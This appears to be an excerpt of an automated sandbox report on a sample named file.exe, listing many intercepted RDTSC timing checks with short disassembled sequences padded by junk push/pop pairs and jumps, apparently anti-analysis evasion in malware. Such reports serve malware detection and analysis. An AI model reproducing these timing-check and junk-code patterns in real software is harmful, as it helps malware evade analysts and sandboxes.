Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12277FB second address: 122782F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3FAC81C966h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122782F second address: 1227833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230EF2 second address: 1230EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3FAC81C956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230EFC second address: 1230F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F3FACC550E4h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230F27 second address: 1230F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FAC81C968h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123121F second address: 1231223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231223 second address: 1231255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C962h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F3FAC81C96Ah 0x00000011 jmp 00007F3FAC81C95Eh 0x00000016 jng 00007F3FAC81C956h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231544 second address: 1231548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231548 second address: 1231554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231554 second address: 1231576 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3FACC550E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F3FACC550DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231D3B second address: 1231D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C967h 0x00000009 jns 00007F3FAC81C956h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231D63 second address: 1231D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123220D second address: 1232213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230A66 second address: 1230A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230A6E second address: 1230A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1237622 second address: 1237626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1237626 second address: 123762F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1237904 second address: 1237913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F3FACC550D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123A292 second address: 123A296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123A296 second address: 123A29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1D68 second address: 11A1D8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3FAC81C96Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1D8A second address: 11A1DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E2EC second address: 123E2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF4A5 second address: 11AF4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3FACC550D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F3FACC550E0h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF4C8 second address: 11AF4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF4CC second address: 11AF4D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA1F second address: 123DA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA2A second address: 123DA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA2E second address: 123DA71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F3FAC81C95Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3FAC81C960h 0x00000016 jc 00007F3FAC81C96Ch 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F3FAC81C964h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA71 second address: 123DA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA77 second address: 123DA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD03 second address: 123DD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD09 second address: 123DD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F3FAC81C956h 0x0000000f ja 00007F3FAC81C956h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD1E second address: 123DD3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD3A second address: 123DD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD3E second address: 123DD48 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3FACC550D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD48 second address: 123DD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F3FAC81C96Dh 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEA5 second address: 123DEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550E3h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007F3FACC550D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEC8 second address: 123DEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3FAC81C966h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12435D6 second address: 12435EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F3FACC550DDh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243939 second address: 1243945 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243CDF second address: 1243D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E4h 0x00000007 push eax 0x00000008 js 00007F3FACC550D6h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F3FACC550DEh 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243D13 second address: 1243D25 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FAC81C95Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243D25 second address: 1243D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC17E second address: 11EC183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC183 second address: 11EC189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC31A second address: 11EC36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnc 00007F3FAC81C956h 0x0000000e jmp 00007F3FAC81C965h 0x00000013 popad 0x00000014 pop edx 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D33D1h], edi 0x0000001c push 0000001Eh 0x0000001e mov cl, al 0x00000020 mov ecx, dword ptr [ebp+122D1BEFh] 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push esi 0x0000002b pop esi 0x0000002c jmp 00007F3FAC81C964h 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243E83 second address: 1243E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243E89 second address: 1243E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124402C second address: 1244048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3FACC550DBh 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jbe 00007F3FACC550D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0F0F second address: 11B0F2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3FAC81C964h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124766E second address: 1247680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247680 second address: 12476A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F3FAC81C967h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12476A3 second address: 12476A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12476A7 second address: 12476B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124784C second address: 1247854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247854 second address: 124787D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F3FAC81C956h 0x00000011 jmp 00007F3FAC81C963h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124787D second address: 1247896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007F3FACC550DEh 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247896 second address: 124789E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124789E second address: 12478A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3FACC550D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12478A8 second address: 12478BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FAC81C956h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F3FAC81C956h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D5D4 second address: 124D5F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D5F4 second address: 124D5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D773 second address: 124D781 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D781 second address: 124D787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D787 second address: 124D78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D78B second address: 124D791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D791 second address: 124D79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3FACC550DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D79F second address: 124D7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DC25 second address: 124DC2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DC2A second address: 124DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3FAC81C956h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E1FD second address: 124E21F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F3FACC550D6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jp 00007F3FACC550D6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E21F second address: 124E236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E4F1 second address: 124E4F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E4F6 second address: 124E504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F3FAC81C956h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125411F second address: 1254144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550DBh 0x00000009 jl 00007F3FACC550D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F3FACC550DBh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254144 second address: 1254148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12533A3 second address: 12533AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538A0 second address: 12538B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C95Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538B2 second address: 12538DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3FACC550DEh 0x00000008 jmp 00007F3FACC550DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3FACC550DCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538DC second address: 12538E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538E2 second address: 12538E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253A3F second address: 1253A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253E9C second address: 1253EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258AD6 second address: 1258AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3FAC81C964h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126386D second address: 126387B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263F8B second address: 1263F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264105 second address: 1264123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126427A second address: 126427E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126427E second address: 1264291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3FACC550DAh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264963 second address: 1264969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264969 second address: 1264979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264979 second address: 1264985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264985 second address: 1264994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264994 second address: 1264998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12650D6 second address: 1265110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FACC550D6h 0x0000000a je 00007F3FACC550D6h 0x00000010 popad 0x00000011 jmp 00007F3FACC550DEh 0x00000016 push edi 0x00000017 jmp 00007F3FACC550E8h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A88A second address: 126A899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A899 second address: 126A8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3FACC550D6h 0x0000000a popad 0x0000000b rdtsc
